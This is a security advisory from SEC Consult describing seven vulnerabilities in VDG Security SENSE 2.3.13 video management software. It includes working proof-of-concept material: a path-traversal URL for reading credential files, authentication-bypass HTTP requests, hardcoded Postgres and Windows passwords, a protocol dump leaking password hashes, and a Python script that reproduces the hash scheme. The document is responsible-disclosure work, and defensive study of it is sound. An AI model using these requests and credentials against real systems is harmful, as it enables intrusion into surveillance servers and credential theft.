SEC Consult Vulnerability Lab Security Advisory < 20141218-0 > ======================================================================= title: Multiple critical vulnerabilities product: VDG Security SENSE (formerly DIVA) vulnerable version: 2.3.13 fixed version: unknown - no vendor confirmation impact: critical homepage: https://vdgsecurity.com/ found: 2014-10-01 by: Stefan Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "VDG Sense is our video management system (VMS). VDG Sense gives you control of all live images and stored video data, in a user-friendly interface. Our solution is based on an open platform, tailored to your specific needs and requirements and ready to be integrated in any security solution." Source: https://vdgsecurity.com/sense/ "DIVA is our former trademark, which we used to brand our video management software and other VDG products. With the launch of our new trademark, VDG Sense, we have rebranded the software to VDG Sense and promote it as such from September 15, 2014. Other products, such as our servers, are available under the label VDG." Source: https://vdgsecurity.com/diva/ Business recommendation: ------------------------ Attackers are able to completely compromise the VDG SENSE server as they can gain access at the system level. SENSE server can be used as an entry point into the target infrastructure (lateral movement, privilege escalation). It is highly recommended by SEC Consult not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved. Although the vendor does not respond to our mails any more, some vulnerabilities seem to be fixed in the most recent version of SENSE (2.3.15). It is assumed that further critical vulnerabilities exist. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated local file disclosure Unauthenticated users can read arbitrary files from the filesystem with the privileges of the "SYSTEM" operating system user. These files include configuration files containing sensitive information such as clear text passwords/password hashes which can be used in further attacks. 2) Authentication bypass / Clear text password disclosure Some parts of the DIVA application are vulnerable to authentication bypass. This allows attackers to update DIVA plugin configuration. Furthermore DIVA plugin configurations can be read. This configuration includes clear text DIVA administrator credentials as DIVA plugins requires access to such an account for operation. 3) Insecure service configuration / Hardcoded default credentials - Postgres The PostgreSQL database is offered via the network (TCP port 5432) and can be accessed remotely using hardcoded credentials which can't be changed. 4) Hardcoded default credentials - Windows Users Several local Windows users are created in the course of the DIVA setup. These are used to run some of the DIVA services. These users can be used to log on to the server running DIVA. 5) Critical information disclosure / User database leakage After authentication with the DIVA (fat) client via the proprietary protocol (TCP port 51410) the server returns the contents of the user database to the client. This works regardless of whether the user has administrator rights or not. The user database (users.ini) contains all users and their password hashes. This information is sufficient to log in as another user. An attacker does not require knowledge about plain text passwords. 6) Use of plain text protocols All DIVA communication transport channels (eg. vie TCP port 80, 51410) lack encryption. 7) Buffer overflow vulnerabilities The DIVA web service API (/webservice) is vulnerable to a stack based buffer overflow when processing "AuthenticateUser" requests. Both the "user" and the "password" parameter are vulnerable. None of the DIVA modules are ASLR-enabled. An exploit that uses ROP to bypass DEP has been implemented. Proof of concept: ----------------- 1) Unauthenticated local file disclosure Arbitrary files can be downloaded because of vulnerabilities in the proprietary web server implementation. An example for the x64 hosts: http:///images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini Interesting DIVA-specific files: config/systemprofile/AppData/Roaming/Diva/Settings/users.ini (DIVA user database) config/systemprofile/AppData/Roaming/Diva/DivaManager/DivaManager.ini (contains DIVA "master user") config/systemprofile/AppData/Roaming/Diva/DivaManager/Plugins/ (DIVA plugin configurations) [...] 2) Authentication bypass / Clear text password disclosure Authentication for parts of the application can be bypassed by sending the HTTP Authorization header containing a colon ":". GET /plugins/divacal/getsettings?sessionkey= HTTP/1.1 Host: Authorization: Basic Og== The response contains the plugin configuration for "divacal": HTTP/1.1 200 OK Date: Thu, 23 Okt 2014 10:46:28 GMT Server: Diva HTTP Plugin 2.0 Accept-Ranges: bytes Connection: Keep-Alive Content-Type: application/xml; charset=UTF-8 Content-Length: 1179 DivaCal settings 0 DIVA Connection yes yes [...] 1 DIVAUsername string Administrator Administrator The username used to login to to the DIVA management server. 2 DIVAPassword password !DVadmin !DVadmin The password required to login to the DIVA management server. Other activated plugins can be queried via the following request: GET /plugins/?sessionkey= HTTP/1.1 Host: Authorization: Basic Og== Plugin settings can be updated as follows: POST /plugins/http/updatesettings?sessionkey= HTTP/1.1 Host: Authorization: Basic Og== Content-Length: 29 groupid=0&DocumentRoot=htdocs 3) Insecure service configuration / Hardcoded default credentials - Postgres The Postgres root user is as follows: Username: root Password: ArpaRomaWi 4) Hardcoded default credentials - Windows Users The created Windows users are as follows: Username: postgres Password: !DVService Username: NTP Password: !DVService 5) Critical information disclosure / User database leakage Below is an excerpt from the DIVA protocol communication (TCP port 51410): 00000000 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 H....... ........ <- SERVER 00000010 00 00 00 00 0d 00 00 20 01 00 02 20 03 00 00 20 ....... ... ... 00000020 06 00 11 00 32 2e 33 2e 31 33 00 00 02 00 00 20 ....2.3. 13..... 00000030 01 00 02 40 04 00 00 00 04 00 00 20 06 00 11 00 ...@.... ... .... 00000040 44 69 76 61 20 73 65 72 76 65 72 00 Diva ser ver. 00000000 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ <- CLIENT 00000010 00 00 00 00 29 00 00 20 c9 00 02 40 05 00 00 20 ....).. ...@... Note: client sends passwordHash and digestHash 00000020 f6 01 01 40 61 64 6d 69 6e 69 73 74 72 61 74 6f ...@admi nistrato 00000030 72 00 00 00 09 00 00 20 f7 01 01 40 49 41 68 6b r...... ...@IAhk 00000040 43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33 6b Cr3ahzY9 gSWsV73k 00000050 41 42 32 64 51 79 38 3d 00 00 00 00 0a 00 00 20 AB2dQy8= ....... 00000060 fa 01 01 40 35 34 38 31 35 36 32 31 38 64 33 65 ...@5481 56218d3e 00000070 31 63 35 35 66 63 30 30 35 65 38 32 61 32 32 30 1c55fc00 5e82a220 00000080 61 34 63 30 00 00 00 00 02 00 00 20 05 00 11 40 a4c0.... ... ...@ 00000090 02 00 00 00 03 00 00 20 0b 00 11 40 00 00 00 00 ....... ...@.... 000000A0 00 00 00 00 02 00 00 20 0f 00 11 40 00 00 00 00 ....... ...@.... 000000B0 02 00 00 20 02 00 11 40 00 00 00 00 ... ...@ .... 0000004C 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0....... ........ <- SERVER 0000005C 00 00 00 00 07 00 00 20 ca 00 02 40 02 00 00 20 ....... ...@... 0000006C f5 01 01 40 01 00 00 00 02 00 00 20 02 00 11 40 ...@.... ... ...@ 0000007C 01 00 00 00 .... 000000BC 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 P....... ........ <- CLIENT 000000CC 00 00 00 00 0f 00 00 20 01 00 1c 40 0b 00 00 20 ....... ...@... 000000DC 02 00 1c 40 47 45 54 20 2f 75 73 65 72 6d 61 6e ...@GET /userman 000000EC 61 67 65 6d 65 6e 74 2f 6f 73 64 73 74 79 6c 65 agement/ osdstyle 000000FC 73 20 44 49 56 41 2f 31 2e 30 00 00 01 00 00 20 s DIVA/1 .0..... 0000010C 03 00 1c 40 ...@ 00000080 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $....... ........ <- SERVER 00000090 00 00 00 00 04 00 00 20 07 01 11 40 02 00 00 20 ....... ...@... 000000A0 06 00 11 00 00 00 00 00 24 00 00 00 00 00 00 00 ........ $....... [...] 00000200 9c 02 01 40 02 00 00 20 06 00 11 00 0d 0a 00 00 ...@... ........ 00000210 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000220 00 00 00 00 2a 00 00 20 f4 01 01 40 28 00 00 20 ....*.. ...@(.. 00000230 06 00 11 00 5b 61 64 6d 69 6e 69 73 74 72 61 74 ....[adm inistrat ----- 00000240 6f 72 5d 0d 0a 61 64 6d 69 6e 72 69 67 68 74 73 or]..adm inrights | 00000250 3d 31 0d 0a 61 6e 64 72 6f 69 64 3d 0d 0a 64 69 =1..andr oid=..di | 00000260 67 65 73 74 48 61 73 68 3d 35 34 38 31 35 36 32 gestHash =5481562 | 00000270 31 38 64 33 65 31 63 35 35 66 63 30 30 35 65 38 18d3e1c5 5fc005e8 | 00000280 32 61 32 32 30 61 34 63 30 0d 0a 65 6d 61 69 6c 2a220a4c 0..email | <- DIVA user database 00000290 3d 0d 0a 66 75 6c 6c 6e 61 6d 65 3d 0d 0a 69 6f =..fulln ame=..io | 000002A0 73 3d 0d 0a 70 61 73 73 77 6f 72 64 3d 49 41 68 s=..pass word=IAh | 000002B0 6b 43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33 kCr3ahzY 9gSWsV73 | 000002C0 6b 41 42 32 64 51 79 38 3d 0d 0a 0d 0a 00 00 00 kAB2dQy8 =....... ----- 000002D0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $....... ........ For the sake of completeness the password hashing scheme has been reverse engineered. As both hashes can be used for authentication directly, brute force attacks against password hashes are not required. #!/usr/bin/env python import hashlib from base64 import b64encode user='administrator' password='!DVadmin' digestHash = hashlib.md5(user+":DIVA:"+password).digest().encode('hex').upper() passwordHash = b64encode(hashlib.sha1(hashlib.sha1(password).digest()).digest()) print 'digestHash',digestHash print 'passwordHash',passwordHash 6) Use of plain text protocols No proof of concept necessary. 7) Buffer overflow vulnerabilities Detailed proof of concept exploits have been removed for this vulnerability. Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in 2.3.13, which was the most recent version at the time of discovery. Vendor contact timeline: ------------------------ 2014-10-24: Sending responsible disclosure policy and requesting encryption keys. 2014-10-28: Vendor responds, provides encryption keys. 2014-10-29: Sending advisory and proof of concept exploit via encrypted channel. 2014-10-29: Vendor confirms receipt of advisory. 2014-11-10: Requesting status update. 2014-11-17: Vendor states that team is "very well on track to solve the issues". 2014-11-18: Clarifying criticality of vulnerabilities and viability of attack, even in closed networks; referring to Shodan search results. 2014-12-10: Requesting status update. No reply. 2014-12-18: SEC Consult releases security advisory. Solution: --------- It seems some of the vulnerabilities are fixed in the most recent version of SENSE (2.3.15). The vendor stopped responding to our emails so we don't know what vulnerabilities were actually fixed. Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested in working with the experts of SEC Consult? Write to career@sec-consult.com EOF Stefan Viehböck / @2014